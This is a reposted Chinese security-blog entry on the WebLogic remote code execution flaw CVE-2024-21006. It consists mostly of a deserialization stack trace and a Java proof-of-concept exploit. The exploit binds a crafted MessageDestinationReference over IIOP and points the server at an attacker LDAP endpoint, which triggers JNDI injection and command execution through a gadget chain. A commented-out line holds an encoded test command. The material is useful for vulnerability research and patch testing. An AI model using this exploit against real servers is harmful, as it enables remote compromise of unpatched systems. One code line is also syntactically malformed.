Weblogic RCE(CVE-2024-21006)

admin 2024年4月19日02:54:54评论116 views字数 7329阅读24分25秒阅读模式

漏洞复现

Weblogic RCE(CVE-2024-21006)

漏洞原理

经典JDNI,没啥好分析的。

exec:443, Runtime (java.lang)exec:347, Runtime (java.lang)<clinit>:-1, Pwner572504195750900 (ysoserial)newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)newInstance:62, NativeConstructorAccessorImpl (sun.reflect)newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)newInstance:423, Constructor (java.lang.reflect)newInstance:442, Class (java.lang)getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)serializeAsField:688, BeanPropertyWriter (com.fasterxml.jackson.databind.ser)serializeFields:772, BeanSerializerBase (com.fasterxml.jackson.databind.ser.std)serialize:178, BeanSerializer (com.fasterxml.jackson.databind.ser)defaultSerializeValue:1150, SerializerProvider (com.fasterxml.jackson.databind)serialize:115, POJONode (com.fasterxml.jackson.databind.node)_serializeNonRecursive:105, InternalNodeMapper$WrapperForSerializer (com.fasterxml.jackson.databind.node)serialize:85, InternalNodeMapper$WrapperForSerializer (com.fasterxml.jackson.databind.node)serialize:39, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)serialize:20, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)_serialize:479, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)serializeValue:318, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)serialize:1572, ObjectWriter$Prefetch (com.fasterxml.jackson.databind)_writeValueAndClose:1273, ObjectWriter (com.fasterxml.jackson.databind)writeValueAsString:1140, ObjectWriter (com.fasterxml.jackson.databind)nodeToString:34, InternalNodeMapper (com.fasterxml.jackson.databind.node)toString:242, BaseJsonNode (com.fasterxml.jackson.databind.node)readObject:86, BadAttributeValueExpException (javax.management)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1058, ObjectStreamClass (java.io)readSerialData:1909, ObjectInputStream (java.io)readOrdinaryObject:1808, ObjectInputStream (java.io)readObject0:1353, ObjectInputStream (java.io)readObject:373, ObjectInputStream (java.io)readObject:1404, HashMap (java.util)invoke:-1, GeneratedMethodAccessor2 (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1058, ObjectStreamClass (java.io)readSerialData:1909, ObjectInputStream (java.io)readOrdinaryObject:1808, ObjectInputStream (java.io)readObject0:1353, ObjectInputStream (java.io)readObject:373, ObjectInputStream (java.io)deserializeObject:531, Obj (com.sun.jndi.ldap)decodeObject:239, Obj (com.sun.jndi.ldap)c_lookup:1051, LdapCtx (com.sun.jndi.ldap)p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)lookup:94, ldapURLContext (com.sun.jndi.url.ldap)lookup:417, InitialContext (javax.naming)lookupMessageDestination:76, MessageDestinationReference (weblogic.application.naming)getObjectInstance:20, MessageDestinationObjectFactory (weblogic.application.naming)getObjectInstance:321, NamingManager (javax.naming.spi)lookup:308, WLEventContextImpl (weblogic.jndi.internal)lookup:435, WLContextImpl (weblogic.jndi.internal)lookup:417, InitialContext (javax.naming)resolveObject:461, NamingContextImpl (weblogic.corba.cos.naming)resolve_any:368, NamingContextImpl (weblogic.corba.cos.naming)_invoke:114, _NamingContextAnyImplBase (weblogic.corba.cos.naming)invoke:249, CorbaServerRef (weblogic.corba.idl)invoke:246, ClusterableServerRef (weblogic.rmi.cluster)run:564, BasicServerRef$3 (weblogic.rmi.internal)doAs:386, AuthenticatedSubject (weblogic.security.acl.internal)runAs:163, SecurityManager (weblogic.security.service)handleRequest:561, BasicServerRef (weblogic.rmi.internal)run:138, WLSExecuteRequest (weblogic.rmi.internal.wls)_runAs:352, ComponentInvocationContextManager (weblogic.invocation)runAs:337, ComponentInvocationContextManager (weblogic.invocation)doRunWorkUnderContext:57, LivePartitionUtility (weblogic.work)runWorkUnderContext:41, PartitionUtility (weblogic.work)runWorkUnderContext:655, SelfTuningWorkManagerImpl (weblogic.work)execute:420, ExecuteThread (weblogic.work)run:360, ExecuteThread (weblogic.work)

In weblogic.application.naming.MessageDestinationObjectFactory#getObjectInstance method we can control the obj argument as a MessageDestinationReference instance will be call weblogic.application.naming.MessageDestinationReference#lookupMessageDestination method, in the method we can play jndi attack.

Weblogic RCE(CVE-2024-21006)

POC

Just for security test.
package org.example;import weblogic.j2ee.descriptor.InjectionTargetBean;import weblogic.j2ee.descriptor.MessageDestinationRefBean;import javax.naming.*;import java.util.Hashtable;public class MessageDestinationReference {    public static void main(String[] args) throws Exception {        String ip = "192.168.31.69";        String port = "7001";//        String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";        String rhost = String.format("iiop://%s:%s", ip, port);        Hashtable<String, String> env = new Hashtable<String, String>();        // add wlsserver/server/lib/weblogic.jar to classpath,else will error.        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");        env.put(Context.PROVIDER_URL, rhost);        Context context = new InitialContext(env);//        Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {            @Override            public String[] getDescriptions() {                return new String[0];            }            @Override            public void addDescription(String s) {            }            @Override            public void removeDescription(String s) {            }            @Override            public void setDescriptions(String[] strings) {            }            @Override            public String getMessageDestinationRefName() {                return null;            }            @Override            public void setMessageDestinationRefName(String s) {            }            @Override            public String getMessageDestinationType() {                return "weblogic.application.naming.MessageDestinationReference";            }            @Override            public void setMessageDestinationType(String s) {            }            @Override            public String getMessageDestinationUsage() {                return null;            }            @Override            public void setMessageDestinationUsage(String s) {            }            @Override            public String getMessageDestinationLink() {                return null;            }            @Override            public void setMessageDestinationLink(String s) {            }            @Override            public String getMappedName() {                return null;            }            @Override            public void setMappedName(String s) {            }            @Override            public InjectionTargetBean[] getInjectionTargets() {                return new InjectionTargetBean[0];            }            @Override            public InjectionTargetBean createInjectionTarget() {                return null;            }            @Override            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {            }            @Override            public String getLookupName() {                return null;            }            @Override            public void setLookupName(String s) {            }            @Override            public String getId() {                return null;            }            @Override            public void setId(String s) {            }        }, "ldap://127.0.0.1:1389/deserialJackson"nullnull);        context.bind("L0ne1y",messageDestinationReference);        context.lookup("L0ne1y");    }}

原文始发于微信公众号(安全之道):Weblogic RCE(CVE-2024-21006)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日02:54:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic RCE(CVE-2024-21006)https://cn-sec.com/archives/2669558.html

发表评论

匿名网友 填写信息